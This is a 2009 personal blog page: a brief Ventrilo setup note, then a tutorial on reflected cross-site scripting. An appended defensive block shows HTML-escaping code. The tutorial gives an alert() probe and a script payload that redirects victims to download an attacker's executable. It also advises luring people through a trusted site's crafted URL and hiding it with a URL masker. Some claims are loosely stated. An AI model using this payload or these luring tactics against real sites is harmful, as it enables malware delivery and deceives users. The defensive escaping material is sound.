Friday, February 13, 2009

Woot vent's up

Finally got Ventrilo working... it took forever because I didn't realize it used UDP & only opened the port for TCP. In my defense, 'udp' appeared exactly ZERO times in the configuration info I read. ><. I checked. 

Getting it set up, though, gave me a great idea: how about music over vent?

Tuesday, February 10, 2009

XSS Vulnerabilities

Thousands of new websites are popping up every day on the World Wide Web. It is a great way for people all across the world to display information, to talk with friends, all kinds of great things. We aren't even using the internet to its full potential yet! There's just one problem: the internet is vulnerable, and that makes computers that go ON the internet vulnerable.

Take cross-site scripting (XSS) vulnerabilities. Note that cross-site scripting is abbreviated 'XSS', not 'CSS'. CSS stands for Cascading Style Sheets and is used along with HTML to organize and structure web pages. For all new web designers, it is important to protect yourself against XSS attacks, which are quite common and unbelievably simple to perform.

What is an XSS attack?
XSS is a form of client-side attack. Basically it means that an attacker can inject code into a website from his own computer, even without administrative or FTP privileges. Let's use a common feature on websites as an example: a search box. A user inputs a query into the box and hits search. After a few moments, a new page displays with lists of links to different pages that relate to the search. But what happens to the actual HTML? Next time you search, take a look at the source code that is returned to your browser after a search. Your search term (in an XSS-vulnerable site) was put directly into the HTML. This happens when the search page displays something along the lines of "Your search for: 'yoursearchtermhere'" at the top of the page. XSS abuses that reflected search term: whatever is typed as the term becomes part of the page's HTML, so markup in the term is treated as code by the browser.

How do I know if a page is XSS vulnerable?
This is simple. Go to any sort of input box. This can be a login, password, email, search box, anything that allows you to type and submit. In the box, type "alert('XSS vulnerable')" (make sure to omit the quotation marks and add the script tags). When you hit enter, if a pop-up box displaying "XSS vulnerable" appears, then the page is vulnerable to JavaScript XSS exploits.

How can an XSS vulnerability on my site be used?
There are lots of ways that XSS can be used. One of the more dangerous ways to use it is to inject code to steal users' cookies, which can then be used to trick the website's server into granting you access to that user's account and information. It can also be used to download local files from another person's computer.

Ok... but HOW?
Simple. If you have found a site vulnerable to cross-site scripting, inputting this code will allow you to download a file to someone's computer (you must add < and > around the 'script' and '/script' tags):

script document.location="Your site's .exe file";/script

Put that into the search box and you should be prompted to download your executable. Wonderful. Now what? Now, you copy and paste the full URL from the address bar and you can give it to anyone via forum, IM, email, whatever floats your boat. If someone opens it and downloads the executable, they will download whatever your exe file contained.

No one would be stupid enough to fall for that... would they?
Depends. First of all, this can be done to a trustworthy site. The LAPD site happens to be vulnerable to XSS. Adding your script to the end of the LAPD's site may very well fool most people. But if you really want to hide it from people, then you can use a URL masker/encoder to hide the part of the URL that shows your script request. That will fool most people.

So there you have it. Play around with XSS for a little bit and you will quickly see the dangers that it can pose to an unprotected site. So make sure, if you are building a site, to properly clean up and encode user input before it is written into the page, so that users cannot input their own scripts to hijack your site and/or your clients' computers and information.
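
The search-box case described above, as an added example that is not part of the original post: a results page that reflects the query, first concatenated raw and then HTML-encoded. The function names are hypothetical and the sample queries are constructed.

```javascript
// Added example: reflecting a search term into a results page, unsafe vs. encoded.
// escapeHtml, renderUnsafe, renderSafe and reflectsRaw are hypothetical names.

// Characters that let text break out of an HTML text node or a quoted attribute.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Single pass, so an "&" produced by an earlier replacement is never re-encoded.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the search term is concatenated straight into the markup.
function renderUnsafe(term) {
  return `<h1>Your search for: '${term}'</h1>`;
}

// Hardened: the term is encoded for the HTML context it lands in.
// Other contexts (inside a script block, a URL, a style) need their own encoding.
function renderSafe(term) {
  return `<h1>Your search for: '${escapeHtml(term)}'</h1>`;
}

// Regression check for a test suite: a probe that contains markup characters
// must never come back byte-for-byte in the rendered page.
function reflectsRaw(render, probe) {
  return render(probe).includes(probe);
}

// Constructed sample queries: a normal search and the test string from this post.
const samples = ["cheap flights", "<script>alert('XSS vulnerable')</script>"];
for (const s of samples) {
  console.log("query: ", s);
  console.log("unsafe:", renderUnsafe(s));
  console.log("safe:  ", renderSafe(s));
}
```

With the encoded version the browser shows the typed text on the page instead of running it, and `reflectsRaw` can be kept as a unit test so a later template change does not reintroduce the raw reflection.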



**I DO NOT CONDONE THE USE OF XSS OR ANY OTHER FORM OF 'HACKING' OR SCRIPTING AGAINST A SITE. USE ANYTHING IN THIS POST AT YOUR OWN RISK, AND REMEMBER USE OF IT WITHOUT PERMISSION OF A SITE'S OWNER IS ILLEGAL**